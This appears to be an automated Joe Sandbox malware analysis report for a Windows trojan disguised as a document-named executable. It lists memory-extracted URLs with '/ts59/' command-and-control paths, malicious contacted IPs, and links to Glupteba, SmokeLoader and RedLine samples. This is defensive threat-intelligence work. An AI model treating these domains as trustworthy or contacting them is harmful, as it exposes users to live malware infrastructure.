http://www.texhio.onlineReferer:	explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.kgstrengthandperformance.com	explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.scarytube.world/ts59/www.robottts.com	explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.scarytube.worldReferer:	explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.lostaino.com/ts59/	explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.msn.com/v1/news/Feed/Windows?activityId=DD4083B70FE54739AB05D6BBA3484042&timeOut=5000&oc	explorer.exe, 00000003.00000002.3812362279.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375368578.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.scarytube.world/ts59/	explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ssweatstudio.com	explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wns.windows.com/	explorer.exe, 00000003.00000003.2272115538.00000000090F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3817490344.00000000090F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073987402.00000000090F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1377287114.00000000090F2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.wizardatm.com	explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.asmauardotreschicshoes.com/ts59/www.texhio.online	explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.robottts.com/ts59/	explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.autoitscript.com/autoit3/J	explorer.exe, 00000003.00000000.1379885909.000000000C3F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://word.office.com	explorer.exe, 00000003.00000000.1379885909.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3820341536.000000000C091000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.robottts.comReferer:	explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	explorer.exe, 00000003.00000000.1375368578.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark	explorer.exe, 00000003.00000002.3812362279.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375368578.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.asmauardotreschicshoes.com	explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 00000003.00000002.3812362279.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375368578.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://outlook.com	explorer.exe, 00000003.00000000.1379885909.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3820341536.000000000C091000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.modleavedepts.online/ts59/www.kgstrengthandperformance.com	explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.modleavedepts.onlineReferer:	explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.cloudflare.com/5xx-error-landing	explorer.exe, 00000003.00000002.3823187633.00000000113FF000.00000004.80000000.00040000.00000000.sdmp, control.exe, 00000004.00000002.3810060905.0000000004E7F000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.babyscan.xyz	explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.asmauardotreschicshoes.com/ts59/	explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.lostaino.com/ts59/www.modleavedepts.online	explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://android.notify.windows.com/iOS	explorer.exe, 00000003.00000000.1377287114.000000000913F000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.qjjkxi260l.topReferer:	explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp	explorer.exe, 00000003.00000000.1377287114.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3074348658.0000000008F83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272115538.0000000008F83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3816237958.0000000008F83000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the	explorer.exe, 00000003.00000002.3812362279.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375368578.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.wizardatm.com/ts59/www.zangbreaker.com	explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.femininequantumflowcoach.com	explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.redseadivingadventure.com/ts59/	explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.msn.com/v1/news/Feed/Windows?	explorer.exe, 00000003.00000003.3074348658.0000000008F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272115538.0000000008F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1377287114.0000000008F09000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actua	explorer.exe, 00000003.00000002.3812362279.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375368578.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT	explorer.exe, 00000003.00000002.3812362279.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375368578.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.pollensense.com/	explorer.exe, 00000003.00000000.1375368578.00000000071B2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.wizardatm.comReferer:	explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.lostaino.com	explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://status.squarespace.com	explorer.exe, 00000003.00000002.3823187633.00000000113FF000.00000004.80000000.00040000.00000000.sdmp, control.exe, 00000004.00000002.3810060905.0000000004E7F000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.femininequantumflowcoach.com/ts59/	explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi	explorer.exe, 00000003.00000002.3812362279.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375368578.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b	explorer.exe, 00000003.00000002.3812362279.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375368578.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.micro	explorer.exe, 00000003.00000002.3815542294.0000000008820000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.3814662629.0000000007C70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1376904113.0000000008810000.00000002.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.wizardatm.com/ts59/	explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.zangbreaker.com/ts59/www.babyscan.xyz	explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt	explorer.exe, 00000003.00000002.3812362279.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375368578.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.babyscan.xyz/ts59/www.scarytube.world	explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.zangbreaker.com/ts59/	explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch-	explorer.exe, 00000003.00000002.3812362279.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375368578.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.cn-brand.com/ts59/www.asmauardotreschicshoes.com	explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ssweatstudio.comReferer:	explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.redseadivingadventure.com/ts59/www.ssweatstudio.com	explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 00000003.00000002.3812362279.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375368578.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.texhio.online/ts59/	explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ssweatstudio.com/ts59/	explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it	explorer.exe, 00000003.00000002.3812362279.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375368578.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.modleavedepts.online/ts59/	explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.qjjkxi260l.top/ts59/	explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.cn-brand.comReferer:	explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.robottts.com	explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.kgstrengthandperformance.com/ts59/www.redseadivingadventure.com	explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ssweatstudio.com/ts59/www.qjjkxi260l.top	explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.zangbreaker.comReferer:	explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/music/news/6-rock-ballads-that-tug-at-the-heartstrings/ar-AA1hIdsm	explorer.exe, 00000003.00000002.3812362279.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375368578.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.babyscan.xyzReferer:	explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.redseadivingadventure.com	explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg	explorer.exe, 00000003.00000000.1375368578.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://powerpoint.office.com	explorer.exe, 00000003.00000000.1379885909.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3820341536.000000000C091000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.robottts.com/ts59/www.gb-electric-wheelchairs-8j.bond	explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.foreca.com	explorer.exe, 00000003.00000000.1375368578.00000000071B2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.lostaino.comReferer:	explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.kgstrengthandperformance.com/ts59/	explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.redseadivingadventure.comReferer:	explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.kgstrengthandperformance.comReferer:	explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.gb-electric-wheelchairs-8j.bond	explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
52.86.6.113	hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com	United States	14618	AMAZON-AESUS	true
192.0.78.25	femininequantumflowcoach.com	United States	2635	AUTOMATTICUS	true
13.248.169.48	www.scarytube.world	United States	16509	AMAZON-02US	true
185.53.179.91	www.gb-electric-wheelchairs-8j.bond	Germany	61969	TEAMINTERNET-ASDE	true
198.185.159.144	ext-sq.squarespace.com	United States	53831	SQUARESPACEUS	true
23.227.38.74	shops.myshopify.com	Canada	13335	CLOUDFLARENETUS	true
3.64.163.50	www.robottts.com	United States	16509	AMAZON-02US	true
3.33.130.190	zangbreaker.com	United States	8987	AMAZONEXPANSIONGB	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1465322
Start date and time:	2024-07-01 15:27:26 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 38s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	12
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Sample name:	2024 Lusail Fence-WITH STICKER-2-003.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@279/4@12/8
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 58 Number of non-executed functions: 268
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 40.119.148.38
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, twc.trafficmanager.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: 2024 Lusail Fence-WITH STICKER-2-003.exe

Simulations

Behavior and APIs

Time	Type	Description
09:28:50	API Interceptor	9428531x Sleep call for process: explorer.exe modified
09:29:16	API Interceptor	8543620x Sleep call for process: control.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
52.86.6.113	PxYYzLeAPi.exe	Get hash	malicious	Glupteba, SmokeLoader, Stealc	Browse	cotheme.com/wp-login.php
	B843BuO7i3.exe	Get hash	malicious	Glupteba, RedLine, SmokeLoader	Browse	oldrochester.com/administrator/index.php
	82YWwkVfIS.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader	Browse	vanhellemond.com/admin
